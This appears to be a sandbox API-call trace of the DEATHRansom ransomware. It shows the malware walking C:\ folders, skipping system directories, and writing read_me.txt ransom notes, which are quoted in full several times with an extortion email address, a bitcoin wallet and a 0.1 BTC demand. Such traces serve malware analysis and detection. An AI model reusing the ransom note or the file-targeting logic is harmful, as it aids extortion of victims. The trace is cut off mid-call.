CreateFileW (lpFileName="\\\\?\\C:\\Config.Msi\\read_me.txt" (normalized: "c:\\config.msi\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.817] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.817] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e5d4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e5d4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.818] CloseHandle (hObject=0x780) returned 1 [0073.818] GetProcessHeap () returned 0x280000 [0073.818] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a20070 | out: hHeap=0x280000) returned 1 [0073.818] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0073.818] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0073.818] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0073.818] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0073.818] StrStrW (lpFirst="documents and settings", lpSrch="programdata") returned 0x0 [0073.818] StrStrW (lpFirst="documents and settings", lpSrch="$recycle.bin") returned 0x0 [0073.818] StrStrW (lpFirst="documents and settings", lpSrch="program files") returned 0x0 [0073.818] StrStrW (lpFirst="documents and settings", lpSrch="windows") returned 0x0 [0073.818] StrStrW (lpFirst="documents and settings", lpSrch="all users") returned 0x0 [0073.818] StrStrW (lpFirst="documents and settings", lpSrch="appdata") returned 0x0 [0073.818] GetProcessHeap () returned 0x280000 [0073.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0073.818] lstrcpyW (in: lpString1=0x8a20070, lpString2="\\\\?\\C:\\Documents and Settings" | out: lpString1="\\\\?\\C:\\Documents and Settings") returned="\\\\?\\C:\\Documents and Settings" [0073.818] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 27 [0073.818] QueueUserWorkItem (Function=0x40a710, Context=0x8a20070, Flags=0x0) returned 1 [0073.818] GetProcessHeap () returned 0x280000 [0073.818] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0073.819] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Documents and Settings\\*") returned 31 [0073.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="\x07")) returned 0xffffffff [0073.819] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Documents and Settings\\read_me.txt") returned 41 [0073.819] CreateFileW (lpFileName="\\\\?\\C:\\Documents and Settings\\read_me.txt" (normalized: "c:\\documents and settings\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.819] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.819] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e5d4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e5d4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.820] CloseHandle (hObject=0x780) returned 1 [0073.821] GetProcessHeap () returned 0x280000 [0073.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a30078 | out: hHeap=0x280000) returned 1 [0073.821] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0073.821] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0073.821] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0073.821] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache") returned 15 [0073.821] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0073.821] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0073.821] StrStrW (lpFirst="msocache", lpSrch="programdata") returned 0x0 [0073.821] StrStrW (lpFirst="msocache", lpSrch="$recycle.bin") returned 0x0 [0073.821] StrStrW (lpFirst="msocache", lpSrch="program files") returned 0x0 [0073.821] StrStrW (lpFirst="msocache", lpSrch="windows") returned 0x0 [0073.821] StrStrW (lpFirst="msocache", lpSrch="all users") returned 0x0 [0073.821] StrStrW (lpFirst="msocache", lpSrch="appdata") returned 0x0 [0073.821] GetProcessHeap () returned 0x280000 [0073.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0073.821] lstrcpyW (in: lpString1=0x8a30078, lpString2="\\\\?\\C:\\MSOCache" | out: lpString1="\\\\?\\C:\\MSOCache") returned="\\\\?\\C:\\MSOCache" [0073.821] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 28 [0073.821] QueueUserWorkItem (Function=0x40a710, Context=0x8a30078, Flags=0x0) returned 1 [0073.821] GetProcessHeap () returned 0x280000 [0073.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a40080 [0073.821] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\*") returned 17 [0073.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.822] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\.") returned 17 [0073.822] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.822] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0073.822] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\..") returned 18 [0073.822] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.822] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0073.822] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users") returned 25 [0073.822] lstrcmpW (lpString1="All Users", lpString2="..") returned 1 [0073.822] lstrcmpW (lpString1="All Users", lpString2=".") returned 1 [0073.822] StrStrW (lpFirst="all users", lpSrch="programdata") returned 0x0 [0073.822] StrStrW (lpFirst="all users", lpSrch="$recycle.bin") returned 0x0 [0073.822] StrStrW (lpFirst="all users", lpSrch="program files") returned 0x0 [0073.822] StrStrW (lpFirst="all users", lpSrch="windows") returned 0x0 [0073.822] StrStrW (lpFirst="all users", lpSrch="all users") returned="all users" [0073.822] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="all users", cAlternateFileName="ALLUSE~1")) returned 0 [0073.822] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.822] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\MSOCache\\read_me.txt") returned 27 [0073.822] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\read_me.txt" (normalized: "c:\\msocache\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.823] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.823] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e5d4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e5d4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.823] CloseHandle (hObject=0x780) returned 1 [0073.824] GetProcessHeap () returned 0x280000 [0073.824] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a40080 | out: hHeap=0x280000) returned 1 [0073.824] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x814762c0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0073.824] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0073.824] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x17e630, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0073.824] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0073.824] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0073.824] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0073.824] StrStrW (lpFirst="perflogs", lpSrch="programdata") returned 0x0 [0073.824] StrStrW (lpFirst="perflogs", lpSrch="$recycle.bin") returned 0x0 [0073.824] StrStrW (lpFirst="perflogs", lpSrch="program files") returned 0x0 [0073.824] StrStrW (lpFirst="perflogs", lpSrch="windows") returned 0x0 [0073.824] StrStrW (lpFirst="perflogs", lpSrch="all users") returned 0x0 [0073.824] StrStrW (lpFirst="perflogs", lpSrch="appdata") returned 0x0 [0073.824] GetProcessHeap () returned 0x280000 [0073.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a40080 [0073.824] lstrcpyW (in: lpString1=0x8a40080, lpString2="\\\\?\\C:\\PerfLogs" | out: lpString1="\\\\?\\C:\\PerfLogs") returned="\\\\?\\C:\\PerfLogs" [0073.824] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 29 [0073.824] QueueUserWorkItem (Function=0x40a710, Context=0x8a40080, Flags=0x0) returned 1 [0073.824] GetProcessHeap () returned 0x280000 [0073.824] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a50088 [0073.824] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\*") returned 17 [0073.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.825] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\.") returned 17 [0073.825] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.825] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0073.825] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\..") returned 18 [0073.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.825] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Admin", cAlternateFileName="")) returned 1 [0073.825] wnsprintfW (in: pszDest=0x8a50088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0073.825] lstrcmpW (lpString1="Admin", lpString2="..") returned 1 [0073.825] lstrcmpW (lpString1="Admin", lpString2=".") returned 1 [0073.825] StrStrW (lpFirst="admin", lpSrch="programdata") returned 0x0 [0073.825] StrStrW (lpFirst="admin", lpSrch="$recycle.bin") returned 0x0 [0073.825] StrStrW (lpFirst="admin", lpSrch="program files") returned 0x0 [0073.825] StrStrW (lpFirst="admin", lpSrch="windows") returned 0x0 [0073.825] StrStrW (lpFirst="admin", lpSrch="all users") returned 0x0 [0073.825] StrStrW (lpFirst="admin", lpSrch="appdata") returned 0x0 [0073.825] GetProcessHeap () returned 0x280000 [0073.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a60090 [0073.825] lstrcpyW (in: lpString1=0x8a60090, lpString2="\\\\?\\C:\\PerfLogs\\Admin" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin") returned="\\\\?\\C:\\PerfLogs\\Admin" [0073.826] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 30 [0073.826] QueueUserWorkItem (Function=0x40a710, Context=0x8a60090, Flags=0x0) returned 1 [0073.826] GetProcessHeap () returned 0x280000 [0073.826] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b70118 [0073.827] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\*") returned 23 [0073.827] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.827] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\.") returned 23 [0073.827] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.827] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.827] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.827] wnsprintfW (in: pszDest=0x8b70118, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\..") returned 24 [0073.827] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.827] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 0 [0073.827] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.827] wnsprintfW (in: 